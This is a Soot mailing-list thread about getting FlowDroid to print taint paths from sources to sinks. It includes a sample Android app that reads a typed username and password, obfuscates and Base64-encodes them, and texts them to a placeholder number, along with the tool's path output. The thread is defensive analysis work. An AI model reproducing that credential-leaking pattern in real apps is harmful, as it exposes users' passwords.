[Soot-list] 答复: print the path from source(s) to sink(s) found by flowdroid
XiaoYang
yangx92 at hotmail.com
Tue Dec 8 09:14:14 EST 2015
Hi Steven,
I appended “—pathalgo contextsensitive” to command line. It showed more information than before. However, it lost some information.
For example, below is the android application code snippets.
>>>
protected void onRestart(){
super.onRestart();
EditText usernameText =
(EditText)findViewById(R.id.username);
EditText passwordText =
(EditText)findViewById(R.id.pwdString);
String uname = usernameText.getText().toString();
String pwd = passwordText.getText().toString();
if(!uname.isEmpty() && !pwd.isEmpty())
this.user = new User(uname, pwd);
}
//Callback method defined in xml file
public void sendMessage(View view) throws UnsupportedEncodingException{
if(user == null) return;
Password pwd = user.getpwd();
String pwdString = pwd.getPassword();
String obfPwd = "";
//must track primitives
for(char c : pwdString.toCharArray())
obfPwd += c + "_";
String message = "User: " +
user.getName() + " | PWD: " + obfPwd;
String message_base64 = Base64.encodeToString(message.getBytes(),Base64.DEFAULT);
SmsManager sms = SmsManager.getDefault();
sms.sendTextMessage("+86 12345678901",
null, message_base64, null, null); //pwd_str+uname_str
}
>>>
I run the flowdroid with options“--pathalgo contextsensitive --implicit true -aplength 15”.
Following is the information given by flowdroid.
>>>
The sink virtualinvoke $r9.<android.telephony.SmsManager: void sendTextMessage(java.lang.String,java.lang.String,java.lang.String,android.app.PendingIntent,android.app.PendingIntent)>("+86 12345678901", null, $r5, null, null) on line 49 in method <com.example.leakpasswd.MainActivity: void sendMessage(android.view.View)> was called with values from the following sources:
- - $r1 = virtualinvoke $r0.<com.example.leakpasswd.MainActivity: android.view.View findViewById(int)>(2131230724) on line 26 in method <com.example.leakpasswd.MainActivity: void onRestart()>
on Path:
-> <com.example.leakpasswd.MainActivity: void onRestart()>
-> $r1 = virtualinvoke $r0.<com.example.leakpasswd.MainActivity: android.view.View findViewById(int)>(2131230724)
-> <com.example.leakpasswd.MainActivity: void onRestart()>
-> $r3 = (android.widget.EditText) $r1
-> <com.example.leakpasswd.MainActivity: void onRestart()>
-> $r4 = virtualinvoke $r3.<android.widget.EditText: android.text.Editable getText()>()
-> <com.example.leakpasswd.MainActivity: void onRestart()>
-> $r6 = interfaceinvoke $r4.<android.text.Editable: java.lang.String toString()>()
-> <com.example.leakpasswd.MainActivity: void onRestart()>
-> $z0 = virtualinvoke $r6.<java.lang.String: boolean isEmpty()>()
-> <com.example.leakpasswd.MainActivity: void onRestart()>
-> if $z0 != 0 goto return
-> <com.example.leakpasswd.MainActivity: void onRestart()>
-> $r0.<com.example.leakpasswd.MainActivity: com.example.leakpasswd.User user> = $r7
-> <com.example.leakpasswd.MainActivity: void onRestart()>
-> return
-> <dummyMainClass: void dummyMainMethod(java.lang.String[])>
-> virtualinvoke $r1.<com.example.leakpasswd.MainActivity: void sendMessage(android.view.View)>($r3)
-> <com.example.leakpasswd.MainActivity: void sendMessage(android.view.View)>
-> $r2 = $r0.<com.example.leakpasswd.MainActivity: com.example.leakpasswd.User user>
-> <com.example.leakpasswd.MainActivity: void sendMessage(android.view.View)>
-> if $r2 != null goto $r2 = $r0.<com.example.leakpasswd.MainActivity: com.example.leakpasswd.User user>
-> <com.example.leakpasswd.MainActivity: void sendMessage(android.view.View)>
-> virtualinvoke $r9.<android.telephony.SmsManager: void sendTextMessage(java.lang.String,java.lang.String,java.lang.String,android.app.PendingIntent,android.app.PendingIntent)>("+86 12345678901", null, $r5, null, null)
>>>
The flowdroid did not track code below.
>>>
for(char c : pwdString.toCharArray())
obfPwd += c + "_";
String message = "User: " +
user.getName() + " | PWD: " + obfPwd;
String message_base64 = Base64.encodeToString(message.getBytes(),Base64.DEFAULT);
>>>
Is there solution to handle this?
Grate thanks!!
Young
发件人: Steven Arzt
发送时间: 2015年12月7日 16:33
收件人: 'XiaoYang';'soot-list at CS.McGill.CA'
主题: AW: [Soot-list] print the path from source(s) to sink(s) found by flowdroid
Hi Xiao,
That’s possible. You need to enable a path reconstruction algorithm that supports path reconstruction. If you are using the FlowDroid command-line application, just append “--pathalgo contextsensitive” to your command line. It will increase the runtime, though.
Best regards,
Steven
Von: soot-list-bounces at CS.McGill.CA [mailto:soot-list-bounces at CS.McGill.CA] Im Auftrag von XiaoYang
Gesendet: Sonntag, 6. Dezember 2015 04:55
An: soot-list at CS.McGill.CA
Betreff: [Soot-list] print the path from source(s) to sink(s) found by flowdroid
Hi all,
Suppose that I found there is information leak in android application by flowdroid. Could I print the path from source(s) to sink(s)?
Take an example. Below is the partial information given by flowdroid.
>>[main] INFO soot.jimple.infoflow.Infoflow - The sink virtualinvoke $r10.<android.telephony.SmsManager: void sendTextMessage(java.lang.String,java.lang.String,java.lang.String,android.app.PendingIntent,android.app.PendingIntent)>("+86 123456789", null, $r6, null, null) in method <com.example.leakpasswd.MainActivity: void onCreate(android.os.Bundle)> was called with values from the following sources:
>>[main] INFO soot.jimple.infoflow.Infoflow - - $r2 = virtualinvoke $r0.<com.example.leakpasswd.MainActivity: android.view.View findViewById(int)>(2131230722) in method <com.example.leakpasswd.MainActivity: void onCreate(android.os.Bundle)>
I want to get the path from findViewById to sendTextMessage. Is there a method to handle that?
Great thanks!!
Young
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://mailman.CS.McGill.CA/pipermail/soot-list/attachments/20151208/8697599e/attachment-0001.html
More information about the Soot-list
mailing list